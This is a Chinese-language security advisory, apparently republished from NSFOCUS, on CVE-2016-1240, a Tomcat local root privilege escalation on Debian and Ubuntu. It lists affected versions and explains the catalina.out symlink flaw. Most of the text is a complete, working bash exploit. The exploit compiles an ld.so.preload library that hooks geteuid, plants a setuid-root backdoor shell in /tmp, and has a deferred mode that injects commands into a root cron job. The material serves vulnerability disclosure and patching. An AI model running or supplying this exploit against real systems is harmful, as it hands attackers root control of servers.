
Debian Ubuntu Root權限受到威脅 Tomcat本地提權漏洞CVE-2016-1240 請安全運維盡快更新








tomcat 8 <= 8.0.36-2

tomcat 7 <= 7.0.70-2

tomcat 6 <= 6.0.45+dfsg-1~deb8u1


tomcat是由apache軟體基金會下屬的jakarta項目開發的一個servlet容器,按照sun microsystems提供的技術規範,實作了對servlet和javaserver page(jsp)的支援,并提供了作為web伺服器的一些特有功能,如tomcat管理和控制平台、安全域管理和tomcat閥等。由于tomcat本身也内含了一個http伺服器,它也可以被視作一個單獨的web伺服器。

廣義的debian是指一個緻力于建立自由作業系統的合作組織及其作品,由于debian項目衆多核心分支中以linux宏核心為主,而且 debian開發者 所建立的作業系統中絕大部分基礎工具來自于gnu工程 ,是以 “debian” 常指debian gnu/linux。





本地攻擊者,作為tomcat使用者(比如說,通過web應用的漏洞)若将catalina.out修改為指向任意系統檔案的連結,一旦tomcat init腳本(root權限運作)在服務重新開機後再次打開catalina.out檔案,攻擊者就可擷取root權限。

<code># run the catalina.sh script as a daemon</code>

<code>set +e</code>

<code>touch "$catalina_pid" "$catalina_base"/logs/catalina.out</code>

<code>chown $tomcat7_user "$catalina_pid" "$catalina_base"/logs/catalina.out</code>

<code>------[ tomcat-rootprivesc-deb.sh ]------</code>

<code>#!/bin/bash  #  # tomcat 6/7/8 on debian-based distros - local root privilege escalation exploit  #  # cve-2016-1240  #  # discovered and coded by:  #  # dawid golunski  # http://legalhackers.com  #  # this exploit targets tomcat (versions 6, 7 and 8) packaging on  # debian-based distros including debian, ubuntu etc.  # it allows attackers with a tomcat shell (e.g. obtained remotely through a  # vulnerable java webapp, or locally via weak permissions on webapps in the  # tomcat webroot directories etc.) to escalate their privileges to root.  #  # usage:  # ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]  #  # the exploit can used in two ways:  #  # -active (assumed by default) - which waits for a tomcat restart in a loop and instantly  # gains/executes a rootshell via ld.so.preload as soon as tomcat service is restarted.  # it also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up  # a tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)  #  # -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to  # /etc/default/locale and exits. it removes the need for the exploit to run in a loop waiting.  # attackers can come back at a later time and check on the /etc/default/locale file. upon a  # tomcat restart / server reboot, the file should be owned by tomcat user. the attackers can  # then add arbitrary commands to the file which will be executed with root privileges by  # the /etc/cron.daily/tomcatn logrotation cronjob (run daily around 6:25am on default  # ubuntu/debian tomcat installations).  #  # see full advisory for details at:  # http://legalhackers.com/advisories/tomcat-debpkgs-root-privilege-escalation-exploit-cve-2016-1240.html  #  # disclaimer:  # for testing purposes only. do no harm.  #</code>

<code>backdoorsh="/bin/bash"  backdoorpath="/tmp/tomcatrootsh"  privesclib="/tmp/privesclib.so"  privescsrc="/tmp/privesclib.c"  suidbin="/usr/bin/sudo"</code>

<code>function cleanexit {  # cleanup  echo -e "\n[+] cleaning up..."  rm -f $privescsrc  rm -f $privesclib  rm -f $tomcatlog  touch $tomcatlog  if [ -f /etc/ld.so.preload ]; then  echo -n &gt; /etc/ld.so.preload 2&gt;/dev/null  fi  echo -e "\n[+] job done. exiting with code $1 \n"  exit $1  }</code>

<code>function ctrl_c() {  echo -e "\n[+] active exploitation aborted. remember you can use -deferred switch for deferred exploitation."  cleanexit 0  }</code>

<code>#intro  echo -e "\033[94m \ntomcat 6/7/8 on debian-based distros - local root privilege escalation exploit\ncve-2016-1240\n"  echo -e "discovered and coded by: \n\ndawid golunski \nhttp://legalhackers.com \033[0m"</code>

<code># args  if [ $# -lt 1 ]; then  echo -e "\n[!] exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"  exit 3  fi  if [ "$2" = "-deferred" ]; then  mode="deferred"  else  mode="active"  fi</code>

<code># priv check  echo -e "\n[+] starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"  id | grep -q tomcat  if [ $? -ne 0 ]; then  echo -e "\n[!] you need to execute the exploit as tomcat user! exiting.\n"  exit 3  fi</code>

<code># set target paths  tomcatlog="$1"  if [ ! -f $tomcatlog ]; then  echo -e "\n[!] the specified tomcat catalina.out log ($tomcatlog) doesn't exist. try again.\n"  exit 3  fi  echo -e "\n[+] target tomcat log file set to $tomcatlog"</code>

<code># [ deferred exploitation ]</code>

<code># symlink the log file to /etc/default/locale file which gets executed daily on default  # tomcat installations on debian/ubuntu by the /etc/cron.daily/tomcatn logrotation cronjob around 6:25am.  # attackers can freely add their commands to the /etc/default/locale script after tomcat has been  # restarted and file owner gets changed.  if [ "$mode" = "deferred" ]; then  rm -f $tomcatlog &amp;&amp; ln -s /etc/default/locale $tomcatlog  if [ $? -ne 0 ]; then  echo -e "\n[!] couldn't remove the $tomcatlog file or create a symlink."  cleanexit 3  fi  echo -e  "\n[+] symlink created at: \n`ls -l $tomcatlog`"  echo -e  "\n[+] the current owner of the file is: \n`ls -l /etc/default/locale`"  echo -ne "\n[+] keep an eye on the owner change on /etc/default/locale . after the tomcat restart / system reboot"  echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"  echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatn log rotation cron. see also -active mode if you can't wait ;)\n\n"  exit 0  fi</code>

<code># [ active exploitation ]</code>

<code>trap ctrl_c int  # compile privesc preload library  echo -e "\n[+] compiling the privesc shared library ($privescsrc)"  cat &lt;&lt;_solibeof_&gt;$privescsrc  #define _gnu_source  #include &lt;stdio.h&gt;  #include &lt;sys/stat.h&gt;  #include &lt;unistd.h&gt;  #include &lt;dlfcn.h&gt;  uid_t geteuid(void) {  static uid_t  (*old_geteuid)();  old_geteuid = dlsym(rtld_next, "geteuid");  if ( old_geteuid() == 0 ) {  chown("$backdoorpath", 0, 0);  chmod("$backdoorpath", 04777);  unlink("/etc/ld.so.preload");  }  return old_geteuid();  }  _solibeof_  gcc -wall -fpic -shared -o $privesclib $privescsrc -ldl  if [ $? -ne 0 ]; then  echo -e "\n[!] failed to compile the privesc lib $privescsrc."  cleanexit 2;  fi</code>

<code># prepare backdoor shell  cp $backdoorsh $backdoorpath  echo -e "\n[+] backdoor/low-priv shell installed at: \n`ls -l $backdoorpath`"</code>

<code># safety check  if [ -f /etc/ld.so.preload ]; then  echo -e "\n[!] /etc/ld.so.preload already exists. exiting for safety."  cleanexit 2  fi</code>

<code># symlink the log file to ld.so.preload  rm -f $tomcatlog &amp;&amp; ln -s /etc/ld.so.preload $tomcatlog  if [ $? -ne 0 ]; then  echo -e "\n[!] couldn't remove the $tomcatlog file or create a symlink."  cleanexit 3  fi  echo -e "\n[+] symlink created at: \n`ls -l $tomcatlog`"</code>

<code># wait for tomcat to re-open the logs  echo -ne "\n[+] waiting for tomcat to re-open the logs/tomcat service restart..."  echo -e  "\nyou could speed things up by executing : kill [tomcat-pid] (as tomcat user) if needed ;)"  while :; do  sleep 0.1  if [ -f /etc/ld.so.preload ]; then  echo $privesclib &gt; /etc/ld.so.preload  break;  fi  done</code>

<code># /etc/ld.so.preload file should be owned by tomcat user at this point  # inject the privesc.so shared library to escalate privileges  echo $privesclib &gt; /etc/ld.so.preload  echo -e "\n[+] tomcat restarted. the /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"  echo -e "\n[+] adding $privesclib shared lib to /etc/ld.so.preload"  echo -e "\n[+] the /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"</code>

<code># escalating privileges via the suid binary (e.g. /usr/bin/sudo)  echo -e "\n[+] escalating privileges via the $suidbin suid binary to get root!"  sudo --help 2&gt;/dev/null &gt;/dev/null</code>

<code># check for the rootshell  ls -l $backdoorpath | grep rws | grep -q root  if [ $? -eq 0 ]; then  echo -e "\n[+] rootshell got assigned root suid perms at: \n`ls -l $backdoorpath`"  echo -e "\n\033[94mplease tell me you're seeing this too ;) \033[0m"  else  echo -e "\n[!] failed to get root"  cleanexit 2  fi</code>

<code># execute the rootshell  echo -e "\n[+] executing the rootshell $backdoorpath now! \n"  $backdoorpath -p -c "rm -f /etc/ld.so.preload; rm -f $privesclib"  $backdoorpath -p</code>

<code># job done.  cleanexit 0</code>

<code>--------------[ eof ]-------------------- </code>



本文由:綠盟科技 釋出,版權歸屬于原作者

